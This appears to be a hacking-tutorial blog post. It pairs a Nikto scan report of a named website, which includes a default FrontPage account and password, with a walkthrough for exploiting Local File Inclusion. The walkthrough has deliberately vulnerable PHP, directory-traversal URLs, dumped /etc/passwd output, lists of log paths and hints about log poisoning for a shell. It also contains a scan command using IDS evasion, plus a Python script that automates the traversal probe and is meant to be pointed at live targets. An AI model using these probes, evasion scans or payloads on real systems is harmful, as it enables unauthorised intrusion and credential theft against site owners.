+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ Default account found for 'Secured Frontpage on PennyStockAdvice.com' at /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /stats/: This might be interesting...
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time: 2012-01-21 13:58:55 (time format) (4233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
As you can see, Nikto found many things. It is very effective at finding default files and directories.
Note: you have to understand the output of a tool; otherwise it is useless to you. For instance, most of the OSVDB-3092 entries above are "might be interesting" hints rather than confirmed vulnerabilities, and the "appears to be outdated" lines are based only on the banner, so they can be false positives.
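To make that triage easier, here is an added Python example (not part of the original post, and not a Nikto feature) that parses the text report above into structured findings. Nikto's finding lines have the shape "+ <reference>: <path>: <description>", where everything but the description is optional; the parser pulls out the OSVDB/CVE ids and tags each finding with a rough keyword-based severity. The severity keywords are this script's own assumption, and the sample report is a cut-down copy of the output shown above.

```python
"""Turn Nikto's text report into structured findings for triage.

Added example; not code from the original post or from Nikto. Parses the
'+ <ref>: <path>: <description>' lines (ref and path optional), extracts the
OSVDB/CVE ids and assigns a heuristic severity so the report can be sorted.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Informational header/footer lines that are not findings.
HEADER_RE = re.compile(
    r"^(?:(?:Target (?:IP|Hostname|Port)|Start Time|End Time|Server|Retrieved \S+ header):"
    r"|\d+ items? checked|\d+ host\(s\) tested)")
REF_RE = re.compile(r"^(OSVDB-\d+|CVE-\d{4}-\d+):\s+")     # leading reference id
PATH_RE = re.compile(r"^(/\S*)?:\s+")                      # '/path: ' or ': ' (web root)
ID_RE = re.compile(r"\b(?:OSVDB-\d+|CVE-\d{4}-\d+)\b")     # ids embedded in the text

# Heuristic (an assumption of this script): anything hinting at code
# execution is 'high', exposure of files/methods is 'medium', the rest 'info'.
HIGH_WORDS = ("execute", "remote shell", "buffer overflow", "default account")
MEDIUM_WORDS = ("directory indexing", "browse", "trace method", "remote vulnerabilities")


@dataclass
class Finding:
    ref: Optional[str]
    path: Optional[str]
    desc: str
    severity: str
    ids: List[str] = field(default_factory=list)


def classify(desc: str) -> str:
    d = desc.lower()
    if any(w in d for w in HIGH_WORDS):
        return "high"
    if any(w in d for w in MEDIUM_WORDS):
        return "medium"
    return "info"


def parse_nikto(report: str) -> List[Finding]:
    """Parse every '+ ...' finding line of a Nikto text report."""
    findings = []
    for raw in report.splitlines():
        if not raw.startswith("+ "):
            continue
        line = raw[2:].strip()
        if HEADER_RE.match(line):
            continue
        ref = path = None
        m = REF_RE.match(line)
        if m:
            ref, line = m.group(1), line[m.end():]
        m = PATH_RE.match(line)
        if m:                                   # empty path means the web root
            path, line = m.group(1) or "/", line[m.end():]
        ids = [ref] if ref else []
        ids += [i for i in ID_RE.findall(line) if i not in ids]
        findings.append(Finding(ref, path, line, classify(line), ids))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, object]:
    """Counts per severity plus the paths that expose directory listings."""
    return {
        "by_severity": dict(Counter(f.severity for f in findings)),
        "listable_dirs": sorted({f.path for f in findings
                                 if f.path and "directory indexing" in f.desc.lower()}),
    }


# Constructed sample: a subset of the report lines shown in the post.
SAMPLE_NIKTO = """\
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: ip address
+ Target Hostname: target.com
+ Target Port: 80
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ OSVDB-3092: /stats/: This might be interesting...
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time: 2012-01-21 13:58:55 (time format) (4233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
"""

if __name__ == "__main__":
    for f in sorted(parse_nikto(SAMPLE_NIKTO), key=lambda f: f.severity):
        print(f.severity, f.ref, f.path, f.ids, f.desc[:60])
    print(summarize(parse_nikto(SAMPLE_NIKTO)))
```

Feed it a saved report (./nikto.pl -h target.com -o report.txt -Format txt) and the "high" bucket is what to verify by hand first; the OSVDB ids also give you something to search on, since Nikto's one-line descriptions are often all it says about a check.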
We can use various options (see the help). For example:
root@bt:/pentest/web/nikto# ./nikto.pl -host target.com -root /admin -port 443 -evasion 1
How does this work? Simple:
-host (same as -h): the target site
-root /admin: prepend /admin to every request, so the whole scan runs under that directory
-port 443: the site is not running on the default port 80; I know it is running on 443 (add -ssl to force SSL if needed)
-evasion 1: IDS evasion technique 1 (random URI encoding, non-UTF8)
I hope you got some idea about it. Remember that learning to run tools is not the same as learning to hack; if your mindset is that of a script kiddie, the tools will not help you. Be aware of that before using them.
For more information visit http://cirt.net/nikto2
Good luck!!!
Exploiting Local File Inclusion vulnerability (LFI)
Local File Inclusion means loading a local file, such as /etc/passwd or /etc/hosts, through a PHP web page. Several programming mistakes lead to this vulnerability. It occurs when the programmer passes unchecked user input to one of these:
include
include_once
require
require_once
fopen
(fopen does not execute the included file, but it still lets an attacker read it.)
For example, suppose a page contains:
<?php
// Deliberately vulnerable: the file name comes straight from the URL, unchecked.
$vulnerable = $_GET['vulnerable'];
include($vulnerable);   // could equally be require, require_once, fopen, etc.
?>
This code is vulnerable to Local File Inclusion.
Suppose our target URL is www.n00bprogammer.com/vulnerable/
If you open that URL directly in the browser you get a web page, which means there is an "index.php" in that directory.
If we try:
www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work: not enough ../ to climb to the filesystem root)
www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd
it outputs:
And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false
That means it worked. Note that modern Unix-like systems no longer keep the password hashes in /etc/passwd (they are all in /etc/shadow), and since the web server does not run as root you do not have permission to read /etc/shadow this way.
There are many other files you may be interested in reading, for example the web server logs:
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
Many sites pass file names, complete with extension, in URL parameters and use the value to load a PHP, image or ASP file. This is not secure at all. For example:
www.target.site/vulnerable.php?=image.jpeg
This may also be vulnerable to LFI... Try it.
Advanced attackers can go deeper. For example:
1. There are ways of attacking the application tier to get a shell and eventually root the system (hint: poisoning error_log, which the include can then read and execute).
2. Reading more valuable files (hint: SQL; database configuration and dump files hold credentials).
Try them, research and learn...
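The LFI steps above, automated in Python as an added example (not code from the original post): walking up the directory tree with more and more ../ until the include resolves to /etc/passwd, and recognising a real passwd file in the response instead of eyeballing it. The parameter name "vulnerable" and the script path come from the post; the in-memory fake server at the bottom stands in for the vulnerable index.php (assumed to live in /var/www/vulnerable) so the script runs offline, and the sample passwd content is constructed from a few of the lines shown above.

```python
"""Probe and confirm a Local File Inclusion with /etc/passwd.

Added example, not code from the original post. Generates traversal payloads
of increasing depth, sends them through a caller-supplied HTTP function, and
confirms success by parsing passwd lines out of the response body.
"""
import posixpath
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

# name:pw:uid:gid:gecos:home:shell  (seven colon-separated fields)
PASSWD_LINE = re.compile(r"^([^:\s]+):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$")


def traversal_payloads(target: str, max_depth: int = 8) -> List[str]:
    """'../' * depth + target for depth 0..max_depth. The leading slash is
    dropped so the path is resolved relative to the including script's dir."""
    rel = target.lstrip("/")
    return ["../" * d + rel for d in range(max_depth + 1)]


def parse_passwd(body: str) -> List[Tuple[str, int, str]]:
    """Return (user, uid, shell) for every well-formed passwd line in the
    body; HTML and other page content around the file is ignored."""
    accounts = []
    for line in body.splitlines():
        m = PASSWD_LINE.match(line.strip())
        if m:
            accounts.append((m.group(1), int(m.group(3)), m.group(7)))
    return accounts


def looks_like_passwd(body: str) -> bool:
    """Success test: a uid-0 'root' entry plus at least one more account."""
    accounts = parse_passwd(body)
    return any(u == "root" and uid == 0 for u, uid, _ in accounts) and len(accounts) > 1


def probe_lfi(send: Callable[[str], str], base_url: str, param: str = "vulnerable",
              target: str = "/etc/passwd", max_depth: int = 8) -> Optional[Tuple[int, str]]:
    """Try each traversal depth in turn; return (depth, payload) of the first
    one whose response contains a recognisable passwd file, else None."""
    for depth, payload in enumerate(traversal_payloads(target, max_depth)):
        body = send(f"{base_url}?{urlencode({param: payload})}")
        if looks_like_passwd(body):
            return depth, payload
    return None


# ---- constructed offline stand-in for the vulnerable index.php ----
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
"""
FAKE_FS: Dict[str, str] = {"/etc/passwd": SAMPLE_PASSWD}
SCRIPT_DIR = "/var/www/vulnerable"        # assumed location of index.php


def fake_vulnerable_server(url: str) -> str:
    """Emulates include($_GET['vulnerable']) with no filtering: resolves the
    requested path relative to the script directory and echoes the file."""
    requested = parse_qs(urlsplit(url).query).get("vulnerable", [""])[0]
    resolved = posixpath.normpath(posixpath.join(SCRIPT_DIR, requested))
    content = FAKE_FS.get(resolved, "Warning: include(): failed to open stream")
    return "<html><body>\n" + content + "</body></html>"


if __name__ == "__main__":
    print(probe_lfi(fake_vulnerable_server, "http://www.n00bprogammer.com/vulnerable/index.php"))
```

Once the working depth is known, the same prefix of ../ reaches any file the web server user can open, which is how you would go on to try the log paths listed above. Against a real target, pass a function that performs the HTTP request and returns the body as `send`.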
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion
Let me know if you have any question please...